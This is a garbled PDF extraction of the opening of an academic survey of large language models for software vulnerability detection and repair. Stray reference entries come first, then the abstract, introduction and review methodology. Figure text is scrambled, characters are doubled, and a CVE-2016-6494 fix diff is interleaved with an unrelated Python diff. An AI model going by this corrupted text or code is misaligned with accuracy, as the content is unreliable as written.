[34] M. Fu, C. K. Tantithamthavorn, V. Nguyen, and T. Le, “Chatgpt arXiv:2304.00385,2023. for vulnerability detection, classification, and repair: How far [14] ——,“Lesstraining,morerepairingplease:revisitingautomated are we?” in 2023 30th Asia-Pacific Software Engineering Conference programrepairviazero-shotlearning,”inProceedingsofthe30th (APSEC). IEEE,2023,pp.632–636. ACMJointEuropeanSoftwareEngineeringConferenceandSymposium [35] C.MITRE,“Commonvulnerabilitiesandexposures(cve),”2023. ontheFoundationsofSoftwareEngineering,2022,pp.959–971. [Online].Available:https://cve.mitre.org/ [15] R. Pan, A. R. Ibrahimzada, R. Krishna, D. Sankar, L. P. Wassi, [36] G. Bhandari, A. Naseer, and L. Moonen, “Cvefixes: automated M. Merler, B. Sobolev, R. Pavuluri, S. Sinha, and R. Jabbarvand, collectionofvulnerabilitiesandtheirfixesfromopen-sourcesoft- “Understandingtheeffectivenessoflargelanguagemodelsincode ware,”inProceedingsofthe17thInternationalConferenceonPredictive translation,”arXivpreprintarXiv:2308.03109,2023. ModelsandDataAnalyticsinSoftwareEngineering,2021,pp.30–39. [16] S.Kang,J.Yoon,andS.Yoo,“Largelanguagemodelsarefew-shot [37] Symantec, “securityfocus,” 2023. [Online]. Available: https: testers: Exploring llm-based general bug reproduction,” in 2023 //www.securityfocus.com/ IEEE/ACM 45th International Conference on Software Engineering [38] Y. Zhou, S. Liu, J. Siow, X. Du, and Y. Liu, “Devign: Effective (ICSE). IEEE,2023,pp.2312–2323. vulnerability identification by learning comprehensive program [17] D. Zan, B. Chen, F. Zhang, D. Lu, B. Wu, B. Guan, W. Yongji, semanticsviagraphneuralnetworks,”inInProceedingsofthe33rd andJ.-G.Lou,“Largelanguagemodelsmeetnl2code:Asurvey,” International Conference on Neural Information Processing Systems, in Proceedings of the 61st Annual Meeting of the Association for 2019,p.10197–10207. ComputationalLinguistics(Volume1:LongPapers),2023,pp.7443– [39] M. Fu and C. Tantithamthavorn, “Linevul: A transformer-based 7464. line-levelvulnerabilityprediction,”2022. [18] C. Lemieux, J. P. Inala, S. K. Lahiri, and S. Sen, “Codamosa: Es- [40] S.Cao,X.Sun,L.Bo,R.Wu,B.Li,andC.Tao,“Mvd:Memory- capingcoverageplateausintestgenerationwithpre-trainedlarge relatedvulnerabilitydetectionbasedonflow-sensitivegraphneu- languagemodels,”inInternationalconferenceonsoftwareengineering ralnetworks,”arXivpreprintarXiv:2203.02660,2022. (ICSE),2023. [41] Z.Li,D.Zou,S.Xu,H.Jin,Y.Zhu,andZ.Chen,“Sysevr:Aframe- [19] S.KhanandS.Parkinson,“Reviewintostateoftheartofvulnera- workforusingdeeplearningtodetectsoftwarevulnerabilities,” bilityassessmentusingartificialintelligence,”GuidetoVulnerabil- IEEETransactionsonDependableandSecureComputing,2021. ityAnalysisforComputerNetworksandSystems,pp.3–32,2018. [42] X. Cheng, G. Zhang, H. Wang, and Y. Sui, “Path-sensitive code [20] T. H. Le, H. Chen, and M. A. Babar, “A survey on data-driven embedding via contrastive learning for software vulnerability softwarevulnerabilityassessmentandprioritization,”ACMCom- detection,” in Proceedings of the 31st ACM SIGSOFT International putingSurveys(CSUR),2021. SymposiumonSoftwareTestingandAnalysis,2022,pp.519–531. [21] J.Fan,Y.Li,S.Wang,andT.N.Nguyen,“Ac/c++codevulnerabil- [43] Y.Wu,D.Zou,S.Dou,W.Yang,D.Xu,andH.Jin,“Vulcnn:An itydatasetwithcodechangesandcvesummaries,”inProceedings image-inspiredscalablevulnerabilitydetectionsystem,”2022. ofthe17thInternationalConferenceonMiningSoftwareRepositories, [44] Z.Li,D.Zou,S.Xu,X.Ou,H.Jin,S.Wang,Z.Deng,andY.Zhong, 2020,pp.508–512. “Vuldeepecker: A deep learning-based system for vulnerability [22] “Replication,” 2024. [Online]. Available: https://github.com/ detection,”inProceedingsofthe25thAnnualNetworkandDistributed vinci-grape/VulEmpirical SystemSecuritySymposium,2018.16 [45] D. Hin, A. Kan, H. Chen, and M. A. Babar, “Linevd: Statement- SoftwareEngineeringConferenceandSymposiumontheFoundationsof levelvulnerabilitydetectionusinggraphneuralnetworks,”arXiv SoftwareEngineering,2021,pp.341–353. preprintarXiv:2203.05181,2022. [62] J.Sun,Z.Xing,H.Guo,D.Ye,X.Li,X.Xu,andL.Zhu,“Generating [46] X. Zhan, L. Fan, S. Chen, F. We, T. Liu, X. Luo, and Y. Liu, informative cve description from exploitdb posts by extractive “Atvhunter: Reliable version detection of third-party libraries summarization,” ACM Transactions on Software Engineering and for vulnerability identification in android applications,” in 2021 Methodology(TOSEM),2022. IEEE/ACM 43rd International Conference on Software Engineering [63] H. Guo, S. Chen, Z. Xing, X. Li, Y. Bai, and J. Sun, “Detecting (ICSE). IEEE,2021,pp.1695–1707. and augmenting missing key aspects in vulnerability descrip-
[47] S. Chakraborty, R. Krishna, Y. Ding, and B. Ray, “Deep learning tions,”ACMTransactionsonSoftwareEngineeringandMethodology basedvulnerabilitydetection:Arewethereyet,”IEEETransactions (TOSEM),vol.31,no.3,pp.1–27,2022. onSoftwareEngineering,2021. [64] H.Guo,Z.Xing,S.Chen,X.Li,Y.Bai,andH.Zhang,“Keyaspects [48] C.Ni,X.Yin,K.Yang,D.Zhao,Z.Xing,andX.Xia,“Distinguish- augmentationofvulnerabilitydescriptionbasedonmultiplesecu- ing look-alike innocent and vulnerable code by subtle semantic ritydatabases,”in2021IEEE45thAnnualComputers,Software,and representationlearningandexplanation,”inProceedingsofthe31st ApplicationsConference(COMPSAC). IEEE,2021,pp.1020–1025. ACMJointEuropeanSoftwareEngineeringConferenceandSymposium [65] H.Guo,Z.Xing,andX.Li,“Predictingmissinginformationofkey ontheFoundationsofSoftwareEngineering,2023,pp.1611–1622. aspects in vulnerability reports,” arXiv preprint arXiv:2008.02456, [49] B.Steenhoek,M.M.Rahman,R.Jiles,andW.Le,“Anempirical 2020. studyofdeeplearningmodelsforvulnerabilitydetection,”in2023 [66] G. Fan, R. Wu, Q. Shi, X. Xiao, J. Zhou, and C. Zhang, “Smoke: IEEE/ACM 45th International Conference on Software Engineering scalable path-sensitive memory leak detection for millions of (ICSE). IEEE,2023,pp.2237–2248. linesofcode,”in2019IEEE/ACM41stInternationalConferenceon [50] B.Steenhoek,H.Gao,andW.Le,“Dataflowanalysis-inspireddeep SoftwareEngineering(ICSE). IEEE,2019,pp.72–82. learningforefficientvulnerabilitydetection,”inProceedingsofthe [67] W.Li,H.Cai,Y.Sui,andD.Manz,“Pca:memoryleakdetectionus- 46th IEEE/ACM International Conference on Software Engineering, ingpartialcall-pathanalysis,”inProceedingsofthe28thACMJoint 2024,pp.1–13. MeetingonEuropeanSoftwareEngineeringConferenceandSymposium [51] C.Ni,L.Shen,W.Wang,X.Chen,X.Yin,andL.Zhang,“Fva:As- ontheFoundationsofSoftwareEngineering,2020,pp.1621–1625. sessing function-level vulnerability by integrating flow-sensitive [68] Z. Luo, C. Xu, P. Zhao, Q. Sun, X. Geng, W. Hu, C. Tao, J. Ma, structure and code statement semantic,” in 2023 IEEE/ACM 31st Q.Lin,andD.Jiang,“Wizardcoder:Empoweringcodelargelan- InternationalConferenceonProgramComprehension(ICPC). IEEE, guagemodelswithevol-instruct,”arXivpreprintarXiv:2306.08568, 2023,pp.339–350. 2023. [52] A.Feutrill,D.Ranathunga,Y.Yarom,andM.Roughan,“Theeffect [69] A.Q.Jiang,A.Sablayrolles,A.Mensch,C.Bamford,D.S.Chaplot, ofcommonvulnerabilityscoringsystemmetricsonvulnerability D.d.l.Casas,F.Bressand,G.Lengyel,G.Lample,L.Saulnieretal., exploitdelay,”in2018SixthInternationalSymposiumonComputing “Mistral7b,”arXivpreprintarXiv:2310.06825,2023. andNetworking(CANDAR). IEEE,2018,pp.1–10. [70] “Phi-2: The surprising power of small [53] G. Spanos and L. Angelis, “A multi-target approach to estimate language models,” 2023. [Online]. Avail- softwarevulnerabilitycharacteristicsandseverityscores,”Journal able: https://www.microsoft.com/en-us/research/blog/ ofSystemsandSoftware,vol.146,pp.152–166,2018. phi-2-the-surprising-power-of-small-language-models/ [54] T. H. M. Le, D. Hin, R. Croft, and M. A. Babar, “Deepcva: Au- [71] “Hugging face open llm leaderboard,” 2023. [Online]. Avail- tomatedcommit-levelvulnerabilityassessmentwithdeepmulti- able: https://huggingface.co/spaces/HuggingFaceH4/open tasklearning,”in202136thIEEE/ACMInternationalConferenceon llm leaderboard AutomatedSoftwareEngineering(ASE). IEEE,2021,pp.717–729. [72] A.Z.Yang,C.LeGoues,R.Martins,andV.Hellendoorn,“Large [55] Z.Li,D.Zou,S.Xu,Z.Chen,Y.Zhu,andH.Jin,“Vuldeelocator: languagemodelsfortest-freefaultlocalization,”inProceedingsof a deep learning-based fine-grained vulnerability detector,” IEEE the46thIEEE/ACMInternationalConferenceonSoftwareEngineering, TransactionsonDependableandSecureComputing,2021. 2024,pp.1–12. [56] Y. Li, S. Wang, and T. N. Nguyen, “Vulnerability detection with [73] J. Zhang, C. Wang, A.Li, W. Sun, C. Zhang, W. Ma, and Y. Liu, fine-grainedinterpretations,”inProceedingsofthe29thACMJoint “Anempiricalstudyofautomatedvulnerabilitylocalizationwith MeetingonEuropeanSoftwareEngineeringConferenceandSymposium largelanguagemodels,”arXivpreprintarXiv:2404.00287,2024. ontheFoundationsofSoftwareEngineering,2021,pp.292–303. [74] A.Aghajanyan,B.Huang,C.Ross,V.Karpukhin,H.Xu,N.Goyal, [57] C.Ni,W.Wang,K.Yang,X.Xia,K.Liu,andD.Lo,“TheBestof D. Okhonko, M. Joshi, G. Ghosh, M. Lewis et al., “Cm3: A BothWorlds:IntegratingSemanticFeatureswithExpertFeatures causalmaskedmultimodalmodeloftheinternet,”arXivpreprint forDefectPredictionandLocalization,”inProceedingsofthe2022 arXiv:2201.07520,2022.
30thACMJointMeetingonEuropeanSoftwareEngineeringConference [75] A. Paszke, S. Gross, F. Massa, A. Lerer, J. Bradbury, G. Chanan, andSymposiumontheFoundationsofSoftwareEngineering. ACM, T.Killeen,Z.Lin,N.Gimelshein,L.Antigaetal.,“Pytorch:Anim- 2022,pp.672–683. perativestyle,high-performancedeeplearninglibrary,”Advances [58] C. Ni, K. Yang, X. Xia, D. Lo, X. Chen, and X. Yang, “Defect inneuralinformationprocessingsystems,vol.32,2019. identification, categorization, and repair: Better together,” arXiv [76] “Huggingface,”2023.[Online].Available:https://huggingface.co preprintarXiv:2204.04856,2022. [77] J. Shieh, “Best practices for prompt engineering with openai [59] Q. Zhang, Y. Zhao, W. Sun, C. Fang, Z. Wang, and api,” OpenAI, February https://help.openai. com/en/articles/6654000- L.Zhang,“Programrepair:Automatedvs.manual,”arXivpreprint best-practices-for-prompt-engineering-with-openai-api,2023. arXiv:2203.05166,2022. [78] Z. Ying, D. Bourgeois, J. You, M. Zitnik, and J. Leskovec, “Gn- [60] Z. Chen, S. J. Kommrusch, M. Tufano, L.-N. Pouchet, D. Poshy- nexplainer:Generatingexplanationsforgraphneuralnetworks,” vanyk, and M. Monperrus, “Sequencer: Sequence-to-sequence Advancesinneuralinformationprocessingsystems,vol.32,2019. learning for end-to-end program repair,” IEEE Transactions on [79] Y.Hu,S.Wang,W.Li,J.Peng,Y.Wu,D.Zou,andH.Jin,“Inter- SoftwareEngineering,2019. pretersforgnn-basedvulnerabilitydetection:Arewethereyet?” [61] Q. Zhu, Z. Sun, Y.-a. Xiao, W. Zhang, K. Yuan, Y. Xiong, and inProceedingsofthe32ndACMSIGSOFTInternationalSymposium L. Zhang, “A syntax-guided edit decoder for neural program onSoftwareTestingandAnalysis,2023,pp.1407–1419. repair,” in Proceedings of the 29th ACM Joint Meeting on European [80] C.-Y. Lin, “Rouge: A package for automatic evaluation of sum- maries,”inTextsummarizationbranchesout,2004,pp.74–81.
2404.02525 Large Language Model for Vulnerability Detection and Repair: Literature Review and the Road Ahead XINZHOU,SingaporeManagementUniversity,Singapore SICONGCAO,YangzhouUniversity,China XIAOBINGSUN,YangzhouUniversity,China DAVIDLO,SingaporeManagementUniversity,Singapore ThesignificantadvancementsinLargeLanguageModels(LLMs)haveresultedintheirwidespreadadoption acrossvarioustaskswithinSoftwareEngineering(SE),includingvulnerabilitydetectionandrepair.Numerous studieshaveinvestigatedtheapplicationofLLMstoenhancevulnerabilitydetectionandrepairtasks.Despite theincreasingresearchinterest,thereiscurrentlynoexistingsurveythatfocusesontheutilizationofLLMs for vulnerability detection and repair. In this paper, we aim to bridge this gap by offering a systematic literaturereviewofapproachesaimedatimprovingvulnerabilitydetectionandrepairthroughtheutilization ofLLMs.ThereviewencompassesresearchworkfromleadingSE,AI,andSecurityconferencesandjournals, encompassing43paperspublishedacross25distinctvenues,alongwith15high-qualitypreprintpapers, bringingthetotalto58papers.Byansweringthreekeyresearchquestions,weaimto(1)summarizethe LLMsemployedintherelevantliterature,(2)categorizevariousLLMadaptationtechniquesinvulnerability detection,and(3)classifyvariousLLMadaptationtechniquesinvulnerabilityrepair.Basedonourfindings,we haveidentifiedaseriesoflimitationsofexistingstudies.Additionally,wehaveoutlinedaroadmaphighlighting potentialopportunitiesthatwebelievearepertinentandcrucialforfutureresearchendeavors. CCSConcepts:•Securityandprivacy→Softwareandapplicationsecurity. Additional Key Words and Phrases: Literature review, vulnerability detection, vulnerability repair, large languagemodels 1 INTRODUCTION Asoftwarevulnerabilityreferstoaflaworweaknessinasoftwaresystemthatcanbeexploited by attackers. Recently, the number of software vulnerabilities has increased significantly [93], affectingnumeroussoftwaresystems.Tomitigatetheseissues,researchershaveproposedmethods forautomaticdetectionandrepairofidentifiedvulnerabilities.However,traditionaltechniques, suchasrule-baseddetectorsorprogramanalysis-basedrepairtools,encounterchallengesdueto highfalsepositiverates[85]andtheirinabilitytoworkfordiversetypesofvulnerabilities[128], respectively. Recently,LargeLanguageModels(LLMs)pre-trainedonlargecorpushavedemonstratedremark- ableeffectivenessacrossvariousnaturallanguageandsoftwareengineeringtasks[37].Giventheir recentsuccess,researchershaveproposedvariousLLM-basedapproachestoimproveautomated vulnerabilitydetectionandrepair,demonstratingpromisingoutcomesforbothdetectionandrepair Authors’addresses:XinZhou,SingaporeManagementUniversity,Singapore,xinzhou.2020@phdcs.smu.edu.sg;SicongCao, YangzhouUniversity,China,Dx120210088@yzu.edu.cn;XiaobingSun,YangzhouUniversity,China,xbsun@yzu.edu.cn; DavidLo,SingaporeManagementUniversity,Singapore,davidlo@smu.edu.sg. Permissiontomakedigitalorhardcopiesofallorpartofthisworkforpersonalorclassroomuseisgrantedwithoutfee providedthatcopiesarenotmadeordistributedforprofitorcommercialadvantageandthatcopiesbearthisnoticeand thefullcitationonthefirstpage.CopyrightsforcomponentsofthisworkownedbyothersthanACMmustbehonored. Abstractingwithcreditispermitted.Tocopyotherwise,orrepublish,topostonserversortoredistributetolists,requires priorspecificpermissionand/orafee.Requestpermissionsfrompermissions@acm.org. ©2024AssociationforComputingMachinery. XXXX-XXXX/2024/10-ART$15.00 https://doi.org/XXXXXXX.XXXXXXX ,Vol.1,No.1,Article.Publicationdate:October2024. 4202 tcO 7 ]ES.sc[ 3v52520.4042:viXra2 Zhouetal. BackgroundandPreliminary§2 Data-centricInnovations[21,45,106,115] ReviewMethodology§3 CombinationofLLMwithProgram Analysis[56,75,95,99,107,121] LLMsUsedforVulnerabil- ityDetectionandRepair§4 CombinationofLLMwithOtherDeep LearningModules[41,92,113,134] Fine-tuning§5.1 Domain-specificPre- training[21,34,56,64,90,99] CausalLearning[59] HowtoAdaptLLMsfor DefaultFine-tuning[16,19,26, VulnerabilityDetection§5 27,46,50,81,83,87,89,94,130] Zero-shotPrompting[29,43, 63,76,117,119,130,132] PromptEngineering§5.2 Few-shotPrompting[63,130] LLM-basedmethods forvulnerabilityde- RetrievalAugmentation§5.3[22,55,105,132] tectionandrepair Data-CentricInnovations[12,104,128,133] Model-CentricInnovations[25,38] Fine-tuning§6.1 Domain-specificPre-training[17,18,124,128] ReinforcementLearning[39] HowtoAdaptLLMsfor VulnerabilityRepair§6 DefaultFine-tuning[27,28] Zero-shotPrompting[9,69,74,102,110] PromptEngineering§6.2 Few-shotPrompting[29,70] DataCharacteristics§7.1 CharacteristicsofDatasets andDeployment§7 DeploymentStrategies§7.2 Limitations§8.1 TheRoadAhead§8 Roadmap§8.2 Fig.1. StructureofThisSurvey tasks[88,128].LLM-basedapproachesforvulnerabilitydetectionandrepairareincreasinglyat- tractingattentionduetotheirpotentialtoautomaticallylearnfeaturesfromknownvulnerabilities andfind/fixunseenones.Furthermore,LLMshavethepotentialtoutilizerichknowledgeacquired
fromlarge-scalepre-trainingtoenhancevulnerabilitydetectionandrepair. DespitetheincreasingresearchinterestinutilizingLLMsforvulnerabilitydetectionandrepair, tothebestofourknowledge,nocomprehensiveliteraturereviewhasyetsummarizedthestate- of-the-artapproaches,identifiedthelimitationsofcurrentstudies,andproposedfutureresearch directionsinthisfield.Toeffectivelychartthemostpromisingpathforwardforresearchonthe utilizationofLLMtechniquesinvulnerabilitydetectionandrepair,weconductedaSystematic LiteratureReview(SLR)tobridgethisgap,providingvaluableinsightstothecommunity.Inthis paper,wecollected58primarystudiesoverthelast6years(2018-2024).Wethensummarizedthe LLMsusedinthesestudies,classifiedvarioustechniquesforadaptingLLMs,anddiscussedthe limitationsofexistingresearch.Finally,weproposedaroadmapoutliningfutureresearchdirections andopportunitiesinthisarea. RelatedLiteratureReviews.Researchershaveundertakenaseriesofresearchendeavorsconcern- ingMachineLearning(ML)forsourcecodevulnerabilitydetectionorrepair[30,37,53,109,122]. ,Vol.1,No.1,Article.Publicationdate:October2024.LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 3 Houetal.[37]conductedasystematicliteraturereviewonLLMsforSE.Similarly,Zhangetal.[126] systematicallyreviewedtherecentadvancementsinLLMsforSE.However,duetotheextensive rangeofSEtaskstosummarize,theirreviewdidnotcategorizethedetailedutilizationofLLMs invulnerabilitydetectionandrepair.Incontrast, ourliteraturereviewismorefocusedonvul- nerabilitydetectionandrepair.Ghaffarianetal.[30]studiedvulnerabilityanalysisanddiscovery approachespublishedtill2016.Linetal.[53]reviewedvulnerabilitydetectionapproachesutilizing deeplearningtill2020.Wuetal.[109]investigatedvulnerabilitydetectionapproachespublished beforeMay2022.However,theirfocuswasnotonLLMsandprimarilycoveredgeneralMLmodels suchasrecurrentneuralnetworks.Incontrast,ourliteraturereviewincludespaperspublisheduntil March2024andfocusesonLLMs,encompassing37distinctLLMsutilizedin58relevantstudies. Recently,Zhangetal.[123]reviewedlearning-basedautomatedprogramrepair,whichcovered vulnerabilityrepairaspartofitsstudyscope.InDifferentfromZhangetal.,ourliteraturereviewis morefocusedonLLMsandvulnerabilityrepair:weincludedmorerecentstudies,offeredadetailed categorizationofLLMusagesinvulnerabilityrepair,anddiscussedspecializedfuturedirectionsfor vulnerabilityrepairwithLLMs. Ingeneral,thisstudymakesthefollowingcontributions: • Wepresentasystematicreviewofrecent58primarystudiesfocusingontheutilizationofLLMs forvulnerabilitydetectionandrepair. • WeofferacomprehensivesummaryoftheLLMsutilizedintherelevantliteratureandcategorize varioustechniquesusedtoadaptLLMstodothetwotasks(vulnerabilitydetectionandrepair). • WediscussthelimitationsofexistingstudiesonusingLLMsforvulnerabilitydetectionand repairandproposearoadmapoutliningfutureresearchdirectionsandopportunities. SurveyStructure.Figure1outlinesthestructureofthispaper.Section2providesthebackground information,whileSection3detailsthemethodology.Section4discussestheLLMsemployedin vulnerabilitydetectionandrepair.Sections5and6covertherelevantworkonadaptingandenhanc- ingLLMsforvulnerabilitydetectionandrepair,respectively.Section7discussesthecharacteristics ofdatasetsanddeploymentinLLM-basedvulnerabilitydetectionandrepairstudies.Finally,Sec- tion8discussesthelimitationsofcurrentstudiesandpresentsaroadmapforfutureresearchand opportunities. 2 BACKGROUNDANDPRELIMINARIES 2.1 VulnerabilityDetection/RepairFormulation Inthisstudy,wefocusonsourcecodevulnerabilitydetectionandrepair.Here,wepresentthetask formulationsofthesetwotasks. VulnerabilityDetection.Vulnerabilitydetectionistypicallyframedasabinaryclassification task:𝑋 𝑖 →𝑌 𝑖.Specifically,givenaninputsourcecodefunction𝑋 𝑖,amodelpredictswhetherthe inputfunctionisvulnerable(𝑌 𝑖 =1)ornon-vulnerable(𝑌 𝑖 =0). Vulnerability Repair. Vulnerability repair studies using LLMs frame the task as a sequence- to-sequenceproblem:𝑋 𝑖 → 𝑌 𝑖.Specifically,givenavulnerablecodesnippet𝑋 𝑖,anLLMmodel generatesthecorrespondingrepairedcode𝑌. 𝑖 2.2 LargeLanguageModels(LLMs) The term Large Language Model (LLM) was introduced to distinguish language models based ontheirparametersize,specificallyreferringtolarge-sizedpre-trainedlanguagemodels[127]. However,theliteraturelacksaformalconsensusontheminimumparameterscaleforLLMs[100]. Inthispaper,weadopttheLLMscopedivisionandtaxonomyintroducedbyPanetal.[73]and ,Vol.1,No.1,Article.Publicationdate:October2024.4 Zhouetal. AAuuttoommaatteedd SSeeaarrcchh IIEEEEEE XXpplloorree AACC LLMM iibb rrDD aaii rrgg yyiittaall SSpprriinnggeerrLLiinnkk WWiieellyy SSWW ccee iieebb nn ccoo eeff SScciieenn cccc tteeDDiirree AArrXXiivv LLMs Derive search strings 119977 ppaappeerrss 228855 ppaappeerrss 226666 ppaappeerrss 220055 ppaappeerrss 223377 ppaappeerrss 222200 ppaappeerrss 9900 ppaappeerrss Refine search strings Research Question Identify Export relevant venues Manual Search 1133 SSeelleecctteedd 44 SSeelleecctteedd
ccoonnffeerreenncceess jjoouurrnnaallss Vulnerability Detection & Repair 2277 ppaappeerrss 88 ppaappeerrss Filter by page limit (pages > 5) etaulavE tnemelpmoC Study Identification Manual Search Export 8833 ppaappeerrss FFoorrwwaarrdd BBaacckkwwaarrdd Study selection Export 5500 ppaappeerrss 3333 ppaappeerrss 11,,553355 AAdddd 1166 Total 58 papers ppaappeerrss ppaappeerrss Study Selection Remove Check the venue, Scan full-text to select After quality duplicate studies title, and abstract primary studies assessment 1,387 papers 1,332 papers 212 papers 82 papers 42 papers Fig.2. StudyIdentificationandSelectionProcess categorizethemainstreamLLMsintothreegroupsaccordingtotheirarchitectures:1)encoder- only,2)encoder-decoder,and3)decoder-onlyLLMs.Wewillprovideabriefintroductiontosome LLM+ Other representativeLLMsforeachcategoryduetothespacelimit. Combining with DL Modules Encoder-onlyLLMP sro .grEamn cAondaleysri-sonlyLLMsareatypeofneuralnetworkarchitecturethatutilizes Data-centric only the encoder component of the Transformer model [20]. In the SE domain, examples of Innovations encoder-onlyLLMsincludeCodeBEFRinTe-[23],GraphCodeBERT[33],CuBERT[42],VulBERTa[34], Domain-specific CCBERT[131],PSreO-trBaiEniRngT[36],andBtuEnRinTgOverflow[9D1e]f.ault (~75%) Fine-tuning Encoder-decoderLLMs.Encoder-decoderLLMsintegrateboththeencoderanddecodermodules of the TrRaentrsiefvoarl mer model [97]. The encoderCapursaol cLeeasrsneinsgthe input sentence, while the decoder generatAeusgmthenetattiaonrget output text/code. Prominent examples of encoder-decoder LLMs include LLM Usage PLBART[10],T5[79],CodeT5[103],UniXcoder[32],andNatGen[14]. for Vul. Decoder-onlyLLMs.DeDcoetdecetiro-nonlyLLMsZeexrco-lsuhsoitv elyutilizethedecodermoduleoftheTrans- Prompting former modFeelw-tsohogt enerate the target output text/code. The GPT series, including GPT-2 [78], (~18%) Prompting GPT-3[13],GPT-3.5[71],andGPT-4[72],standasprominentimplementationsofthismodelseries. (~7%) Additionally,intheSEdomain,therearenumerousdecoder-onlyLLMsspecializedforcodeaswell. ExamplesincludeCodeGPT[58],CPorodmepxti[n1g 5],Polycoder[111],Incoder[24],CodeGenseries[66,68], Copilot[31],CodeLlama[60],anEdngSintaeerrCingoder[49]. Encoder-only LLMs 3 REVIEWMETHODOLOGY RQ1 Encoder-decoder only LLMs What LLMs are used? Model-centric Decoder-decoder only LLMs ,Vol.1,No.1,Article.DPuatbal-iCceantitorincdate:OctobInerno2v0a2t4io.ns Innovations Domain-specific pretraining Default Fine- Fine-tuning Combining with program Domain-specific analysis Pre-training tuning (~71%) LLM + other DL modules Reinforcement RQ2 Prompting Learning How are LLMs used Data-centric designs Engineering and augmented in LLM Usage vulnerability detection? for Vul. Causal learning Repair Zero-shot Few-shot Prompting LLM for Vulnerability Prompt engineering Prompting (~23%) Detection & Repair (~6%) Retrieval Augmentation Prompting Engineering Domain-specific pretraining Diverse relevant inputs RQ3 Model-centric designs How are LLMs used and augmented in vulnerability repair? Reinforcement learning Prompt engineering Retrieval Augmentation Vision Challenges and future directions 14 src/mongo/shell/linenoise.cpp @@ -2762,7 +2762,17 @@ int linenoiseHistorySetMaxLen(int len) { 347 347 # Get the HTML fragment inside the appropriate HTML element and then 348 348 # extract the text from it. 349 349 html_frag = extract_text_in(html, u"<div class='lyricbox'>") 350 - lyrics = _scrape_strip_cruft(html_frag, True) 350 + if html_frag: 351 + lyrics = _scrape_strip_cruft(html_frag, True) 351 352 352 - if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 353 - return lyrics 353 + if lyrics and 'Unfortunately, we are not licensed' not in lyrics: 354 + return lyrics 1144 ssrrcc//mmoonnggoo//sshheellll//lliinneennooiissee..ccpppp CCVVEE--22001166--66449944 DDeettaaiill @@@@ --22776622,,77 ++22776622,,1177 @@@@ iinntt lliinneennooiisseeHHiissttoorryySSeettMMaaxxLLeenn((iinntt lleenn)) {{ DDeessccrriippttiioonn 22776622 //** SSaavvee tthhee hhiissttoorryy iinn tthhee ssppeecciiffiieedd ffiillee.. OOnn ssuucccceessss 00 iiss rreettuurrnneedd TThhee cclliieenntt iinn MMoonnggooDDBB uusseess wwoorrlldd--rreeaaddaabbllee ppeerrmmiissssiioonnss oonn ..ddbbsshheellll hhiissttoorryy 22776633 ** ootthheerrwwiissee --11 iiss rreettuurrnneedd.. **// ffiilleess,, wwhhiicchh mmiigghhtt aallllooww llooccaall uusseerrss ttoo oobbttaaiinn sseennssiittiivvee iinnffoorrmmaattiioonn bbyy rreeaaddiinngg 22776644 iinntt lliinneennooiisseeHHiissttoorryySSaavvee((ccoonnsstt cchhaarr** ffiilleennaammee {{ 22776655 -- FFIILLEE&&** ffpp == ffooppeenn((ffiilleennaammee,, ""wwtt""));; tthheessee ffiilleess..
22776666 iiff ((ffpp ==== NNUULLLL)) {{ WWeeaakknneessss EEnnuummeerraattiioonn 22776677 rreettuurrnn --11;; 22776688 }} CCCWWWEEE---IIIDDD CCCWWWEEE NNNaaammmeee 22776699 22777700 ffoorr ((iinntt jj == 00;; jj << hhiissttoorryyLLeenn;; ++++jj)) {{ CCCWWWEEE---222000000 EEExxxpppooosssuuurrreee ooofff SSSeeennnsssiiitttiiivvveee IIInnnfffooorrrmmmaaatttiiiooonnn tttooo aaannn UUUnnnaaauuuttthhhooorrriiizzzeeeddd AAAccctttooorrr 22777711 iiff ((hhiissttoorryy[[jj]][[00]] !!== ''\\00'')) {{ 22777722 ffpprriinnttff((ffpp,, ""%%ss\\nn"",, hhiissttoorryy[[jj]]));; 22777733 }} VVuullTTeelllleerr 2 2 22 2 27 7 77 7 77 7 77 7 74 5 64 5 6 - - } f r} f rc ec el tl to uo us rs re ne n( ( f 0f 0;;pp));; T hT hiihh ssee ttoo rrFF yyII LL ffiiEE llee ssbb ,, ee aaffoo lllloorree ww ssVV llEE ooRR ccaaSS ll IIOO gguuNN ee ssdd tt oo ttooee ss rr eenn aaoo ddtt ssvv eeee nnrr ssiiff iiyy ttii vvtt eehhaa iitt nn ffuu ooss rrmmee aaoo ttiiff ootthh nnee bb pp yy ee rrrr eemm aaii ddss iiss nnii ggoo nn tthhss eeoo ssnn ee 22777777 }} ffiilleess..LargeLanguageModelforVulnerabilityDetectionandRepair:LiteratureReviewandtheRoadAhead 5 3.1 ResearchQuestion Inthispaper,wefocusoninvestigatingfourResearchQuestions(RQs).ThefirstthreeRQsmainly focusonidentifyingwhichLLMsareusedandhowtheyareadaptedforvulnerabilitydetection andrepair: • RQ1:WhatLLMshavebeenutilizedtosolvevulnerabilitydetectionandrepairtasks? • RQ2:HowareLLMsadaptedforvulnerabilitydetection? • RQ3:HowareLLMsadaptedforvulnerabilityrepair? ThefirstthreeRQspertainprimarilytothemodelconstructionphase.Generally,thepipelineofa learning-basedmethodcanbedividedintothreephases:1)datapreparation,2)modelconstruction, and3)deployment.Wealsoinvestigatethecharacteristicsofthedatasetsanddeploymentdesigns inLLM-basedvulnerabilitydetectionandrepairstudies: • RQ4:WhatarethecharacteristicsofthedatasetsanddeploymentstrategiesinLLM- basedvulnerabilitydetectionandrepairstudies? 3.2 SearchStrategy AsshowninFig.2,followingtheguidebyZhangetal.[120],ourinitialstepistoidentifyprimary studiestoanswertheresearchquestions(RQs)above.BecausethefirstLLM(i.e.,BERT[20])was introducedin2018,oursearchfocusedonpaperspublishedfrom2018onwards(i.e.,fromJanuary 2018,toMarch2024).Next,weidentifiedthetoppeer-reviewedandinfluentialconferenceand journalvenuesinthedomainsofSE,AI,andSecurity.Weincluded13conferences(ICSE,ESEC/FSE, ASE,ISSTA,CCS,S&P,USENIXSecurity,NDSS,AAAI,IJCAI,ICML,NIPS,ICLR)and4journals (TOSEM,TSE,TDSC,TIFS).Afterthemanualsearching,weidentified35papersthatwererelevant toourresearchobjectives. Inadditiontomanuallysearchingprimarystudiesfromtop-tiervenues,wealsoconductedan automatedsearchacross7populardatabases,includingIEEEXplore[3],ACMDigitalLibrary[1], SpringerLink[5],Wiely[7],ScienceDirect[4],WebofScience[6]andarXiv[2].Thesearchstring usedintheautomatedsearchiscraftedfromtherelevantpapersidentifiedinthemanualsearch. Pleasekindlycheckthecompletesetofsearchkeywordsinouronlineappendix[8]duetothe 